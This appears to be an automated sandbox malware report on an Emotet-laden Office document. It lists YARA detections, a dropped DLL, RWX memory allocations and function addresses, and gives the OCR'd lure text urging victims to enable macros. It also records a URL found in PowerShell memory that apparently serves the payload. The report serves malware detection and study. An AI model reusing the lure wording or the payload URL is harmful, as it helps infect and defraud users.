Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: https://jeffdahlke.com/css/bg4n3/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000008.00000002.2096911565.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2096946723.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098974182.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102146226.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106781352.0000000000691000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094781101.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097726962.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342697153.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2103138481.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097776820.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102968277.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106704317.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104274004.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101214081.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101161516.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108288197.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108254547.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd"
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd" N@m 13 ;a 10096 G) FI
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. . . . . O a S
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. . . . . O a S
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 7696
Source: unknown	Process created: Commandline size = 7605
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7605	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Lkvi\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D270	7_2_1000D270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011EA7	7_2_10011EA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012750	7_2_10012750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012B5C	7_2_10012B5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001237C	7_2_1001237C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012F7C	7_2_10012F7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296C05	7_2_00296C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294121	7_2_00294121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A4DAD	7_2_002A4DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AC19B	7_2_002AC19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296E8A	7_2_00296E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A533C	7_2_002A533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029FB04	7_2_0029FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00299716	7_2_00299716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029E360	7_2_0029E360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AA7E4	7_2_002AA7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002983F0	7_2_002983F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294828	7_2_00294828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5060	7_2_002A5060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A0C65	7_2_002A0C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A1C79	7_2_002A1C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029F471	7_2_0029F471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029D04B	7_2_0029D04B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029884A	7_2_0029884A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029C8A5	7_2_0029C8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AD08F	7_2_002AD08F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029F099	7_2_0029F099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AA094	7_2_002AA094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029B0E1	7_2_0029B0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A68CB	7_2_002A68CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029792C	7_2_0029792C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029E924	7_2_0029E924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5D36	7_2_002A5D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00295D0E	7_2_00295D0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A2513	7_2_002A2513
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A8978	7_2_002A8978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AC95E	7_2_002AC95E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294D5F	7_2_00294D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002981A0	7_2_002981A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002959B8	7_2_002959B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AB19F	7_2_002AB19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00298994	7_2_00298994
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A39E1	7_2_002A39E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00291600	7_2_00291600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A3600	7_2_002A3600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00293618	7_2_00293618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029D668	7_2_0029D668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029766F	7_2_0029766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029427A	7_2_0029427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A8E79	7_2_002A8E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A2A7D	7_2_002A2A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A7A50	7_2_002A7A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A72AE	7_2_002A72AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A0EA0	7_2_002A0EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296ABA	7_2_00296ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002912B6	7_2_002912B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AA2EA	7_2_002AA2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A9AE2	7_2_002A9AE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00297AE4	7_2_00297AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029DEC9	7_2_0029DEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029D2CE	7_2_0029D2CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A12D1	7_2_002A12D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A76D5	7_2_002A76D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029BB28	7_2_0029BB28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A0705	7_2_002A0705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A8313	7_2_002A8313
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5B60	7_2_002A5B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5748	7_2_002A5748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296342	7_2_00296342
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00292746	7_2_00292746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A3745	7_2_002A3745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029DB5B	7_2_0029DB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00298F55	7_2_00298F55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00293FAB	7_2_00293FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002967AC	7_2_002967AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029B3A2	7_2_0029B3A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002ACBB0	7_2_002ACBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029FFB5	7_2_0029FFB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029EF80	7_2_0029EF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00293B97	7_2_00293B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029B7F8	7_2_0029B7F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002933F4	7_2_002933F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029C3C2	7_2_0029C3C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A6005	8_2_001A6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A3C28	8_2_001A3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A7C4A	8_2_001A7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AC44B	8_2_001AC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B1079	8_2_001B1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AE871	8_2_001AE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B4460	8_2_001B4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B0065	8_2_001B0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AE499	8_2_001AE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B9494	8_2_001B9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BC48F	8_2_001BC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001ABCA5	8_2_001ABCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B5CCB	8_2_001B5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AA4E1	8_2_001AA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B1913	8_2_001B1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A510E	8_2_001A510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B5136	8_2_001B5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A6D2C	8_2_001A6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A3521	8_2_001A3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001ADD24	8_2_001ADD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BBD5E	8_2_001BBD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A415F	8_2_001A415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B7D78	8_2_001B7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BB59B	8_2_001BB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BA59F	8_2_001BA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A7D94	8_2_001A7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A4DB8	8_2_001A4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B41AD	8_2_001B41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A75A0	8_2_001A75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B2DE1	8_2_001B2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A2A18	8_2_001A2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A0A00	8_2_001A0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B2A00	8_2_001B2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001C1600	8_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B6E50	8_2_001B6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A367A	8_2_001A367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B8279	8_2_001B8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B1E7D	8_2_001B1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001ACA68	8_2_001ACA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A6A6F	8_2_001A6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A628A	8_2_001A628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A5EBA	8_2_001A5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001C12B6	8_2_001C12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A06B6	8_2_001A06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B66AE	8_2_001B66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B02A0	8_2_001B02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B06D1	8_2_001B06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B6AD5	8_2_001B6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AD2C9	8_2_001AD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AC6CE	8_2_001AC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B96EA	8_2_001B96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B8EE2	8_2_001B8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A6EE4	8_2_001A6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B7713	8_2_001B7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A8B16	8_2_001A8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AEF04	8_2_001AEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AFB05	8_2_001AFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B473C	8_2_001B473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AAF28	8_2_001AAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001ACF5B	8_2_001ACF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A8355	8_2_001A8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B4B48	8_2_001B4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A5742	8_2_001A5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A1B46	8_2_001A1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B2B45	8_2_001B2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AD760	8_2_001AD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B4F60	8_2_001B4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A2F97	8_2_001A2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AE380	8_2_001AE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BBFB0	8_2_001BBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AF3B5	8_2_001AF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A33AB	8_2_001A33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A5BAC	8_2_001A5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AA7A2	8_2_001AA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AB7C2	8_2_001AB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001AABF8	8_2_001AABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A77F0	8_2_001A77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A27F4	8_2_001A27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B9BE4	8_2_001B9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00206C05	10_2_00206C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00206E8A	10_2_00206E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00204121	10_2_00204121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021533C	10_2_0021533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020FB04	10_2_0020FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00209716	10_2_00209716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020E360	10_2_0020E360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00215748	10_2_00215748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00214DAD	10_2_00214DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021C19B	10_2_0021C19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021A7E4	10_2_0021A7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002083F0	10_2_002083F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00204828	10_2_00204828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00201600	10_2_00201600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00213600	10_2_00213600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00203618	10_2_00203618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00215060	10_2_00215060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00210C65	10_2_00210C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020D668	10_2_0020D668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020766F	10_2_0020766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020F471	10_2_0020F471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00211C79	10_2_00211C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00218E79	10_2_00218E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020427A	10_2_0020427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00212A7D	10_2_00212A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020884A	10_2_0020884A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020D04B	10_2_0020D04B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00217A50	10_2_00217A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00210EA0	10_2_00210EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020C8A5	10_2_0020C8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002172AE	10_2_002172AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002012B6	10_2_002012B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00206ABA	10_2_00206ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021D08F	10_2_0021D08F
